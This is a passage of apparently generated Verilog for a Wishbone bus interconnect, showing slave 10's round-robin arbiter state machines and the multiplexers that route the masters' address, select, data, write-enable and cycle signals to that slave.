                    if ( s10_msel_arb2_req[6] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[7] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[0] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[1] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[2] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[3] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant5:
        begin
            if (  !( s10_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[6] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[7] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[0] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[1] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[2] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[3] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[4] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant6:
        begin
            if (  !( s10_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[7] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[0] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[1] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[2] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[3] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[4] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[5] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb2_grant7:
        begin
            if (  !( s10_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s10_msel_arb2_req[0] ) 
                begin
                    s10_msel_arb2_next_state = s10_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s10_msel_arb2_req[1] ) 
                    begin
                        s10_msel_arb2_next_state = s10_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s10_msel_arb2_req[2] ) 
                        begin
                            s10_msel_arb2_next_state = s10_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s10_msel_arb2_req[3] ) 
                            begin
                                s10_msel_arb2_next_state = s10_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s10_msel_arb2_req[4] ) 
                                begin
                                    s10_msel_arb2_next_state = s10_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb2_req[5] ) 
                                    begin
                                        s10_msel_arb2_next_state = s10_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb2_req[6] ) 
                                        begin
                                            s10_msel_arb2_next_state = s10_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s10_msel_arb3_req = { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd3 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd3 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd3 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd3 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd3 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd3 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd3 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s10_msel_arb3_state <= s10_msel_arb3_grant0;
        end
        else
        begin 
            s10_msel_arb3_state <= s10_msel_arb3_next_state;
        end
    end
    always @ (  s10_msel_arb3_state or  { ( s10_msel_req[7] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[15] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[14] ) ) } == 2'd3 ) ), ( s10_msel_req[6] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[13] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[12] ) ) } == 2'd3 ) ), ( s10_msel_req[5] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[11] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[10] ) ) } == 2'd3 ) ), ( s10_msel_req[4] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[9] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[8] ) ) } == 2'd3 ) ), ( s10_msel_req[3] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[7] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[6] ) ) } == 2'd3 ) ), ( s10_msel_req[2] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[5] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[4] ) ) } == 2'd3 ) ), ( s10_msel_req[1] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[3] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[2] ) ) } == 2'd3 ) ), ( s10_msel_req[0] & ( { ( ( ( s10_msel_pri_sel == 2'd2 ) ) ? ( rf_conf10[1] ) : ( 1'b0 ) ), ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf10[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s10_msel_arb3_next_state = s10_msel_arb3_state;
        case ( s10_msel_arb3_state ) 
        s10_msel_arb3_grant0:
        begin
            if (  !( s10_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[1] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[2] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[3] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[4] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[5] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[6] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[7] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant1:
        begin
            if (  !( s10_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[2] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[3] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[4] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[5] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[6] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[7] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[0] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant2:
        begin
            if (  !( s10_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[3] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[4] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[5] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[6] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[7] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[0] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[1] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant3:
        begin
            if (  !( s10_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[4] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[5] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[6] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[7] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[0] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[1] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[2] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant4:
        begin
            if (  !( s10_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[5] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[6] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[7] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[0] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[1] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[2] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[3] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant5:
        begin
            if (  !( s10_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[6] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[7] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[0] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[1] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[2] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[3] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[4] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant6:
        begin
            if (  !( s10_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[7] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[0] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[1] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[2] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[3] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[4] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[5] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s10_msel_arb3_grant7:
        begin
            if (  !( s10_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s10_msel_arb3_req[0] ) 
                begin
                    s10_msel_arb3_next_state = s10_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s10_msel_arb3_req[1] ) 
                    begin
                        s10_msel_arb3_next_state = s10_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s10_msel_arb3_req[2] ) 
                        begin
                            s10_msel_arb3_next_state = s10_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s10_msel_arb3_req[3] ) 
                            begin
                                s10_msel_arb3_next_state = s10_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s10_msel_arb3_req[4] ) 
                                begin
                                    s10_msel_arb3_next_state = s10_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s10_msel_arb3_req[5] ) 
                                    begin
                                        s10_msel_arb3_next_state = s10_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s10_msel_arb3_req[6] ) 
                                        begin
                                            s10_msel_arb3_next_state = s10_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s10_msel_pri_out or  s10_msel_arb0_state or  s10_msel_arb1_state)
    begin
        if ( s10_msel_pri_out[0] ) 
        begin
            s10_msel_sel1 = s10_msel_arb1_state;
        end
        else
        begin 
            s10_msel_sel1 = s10_msel_arb0_state;
        end
    end
    always @ (  s10_msel_pri_out or  s10_msel_arb0_state or  s10_msel_arb1_state or  s10_msel_arb2_state or  s10_msel_arb3_state)
    begin
        case ( s10_msel_pri_out ) 
        2'd0:
        begin
            s10_msel_sel2 = s10_msel_arb0_state;
        end
        2'd1:
        begin
            s10_msel_sel2 = s10_msel_arb1_state;
        end
        2'd2:
        begin
            s10_msel_sel2 = s10_msel_arb2_state;
        end
        2'd3:
        begin
            s10_msel_sel2 = s10_msel_arb3_state;
        end
        endcase
    end
    assign s10_mast_sel = ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s10_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s10_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s10_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s10_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s10_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s10_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s10_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s10_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s10_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s10_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s10_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s10_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s10_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s10_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s10_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s10_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s10_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s10_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s10_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s10_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s10_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s10_m0_data_o = s10_data_i;
    assign s10_m1_data_o = s10_data_i;
    assign s10_m2_data_o = s10_data_i;
    assign s10_m3_data_o = s10_data_i;
    assign s10_m4_data_o = s10_data_i;
    assign s10_m5_data_o = s10_data_i;
    assign s10_m6_data_o = s10_data_i;
    assign s10_m7_data_o = s10_data_i;
    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s10_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s10_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s10_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s10_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s10_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s10_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s10_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s10_m0_cyc_r <= m0_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m1_cyc_r <= m1_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m2_cyc_r <= m2_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m3_cyc_r <= m3_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m4_cyc_r <= m4_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m5_cyc_r <= m5_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m6_cyc_r <= m6_s10_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s10_m7_cyc_r <= m7_s10_cyc_o;
    end
    always @ (  ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) or  m0_s10_cyc_o or  m1_s10_cyc_o or  m2_s10_cyc_o or  m3_s10_cyc_o or  m4_s10_cyc_o or  m5_s10_cyc_o or  m6_s10_cyc_o or  m7_s10_cyc_o or  s10_m0_cyc_r or  s10_m1_cyc_r or  s10_m2_cyc_r or  s10_m3_cyc_r or  s10_m4_cyc_r or  s10_m5_cyc_r or  s10_m6_cyc_r or  s10_m7_cyc_r)
    begin
        case ( ( ( ( s10_pri_sel == 2'd0 ) ) ? ( s10_arb_state ) : ( ( ( ( s10_msel_pri_sel == 2'd0 ) ) ? ( s10_msel_arb0_state ) : ( ( ( ( s10_msel_pri_sel == 2'd1 ) ) ? ( s10_msel_sel1 ) : ( s10_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s10_wb_cyc_o = ( m0_s10_cyc_o & s10_m0_cyc_r );
        end
        3'd1:
        begin
            s10_wb_cyc_o = ( m1_s10_cyc_o & s10_m1_cyc_r );
        end
        3'd2:
        begin
            s10_wb_cyc_o = ( m2_s10_cyc_o & s10_m2_cyc_r );
        end
        3'd3:
        begin
            s10_wb_cyc_o = ( m3_s10_cyc_o & s10_m3_cyc_r );
        end
        3'd4:
        begin
            s10_wb_cyc_o = ( m4_s10_cyc_o & s10_m4_cyc_r );
        end
        3'd5:
        begin
            s10_wb_cyc_o = ( m5_s10_cyc_o & s10_m5_cyc_r );
        end
        3'd6:
        begin
            s10_wb_cyc_o = ( m6_s10_cyc_o & s10_m6_cyc_r );
        end
        3'd7:
        begin
            s10_wb_cyc_o = ( m7_s10_cyc_o & s10_m7_cyc_r );
        end
        endcase
    end
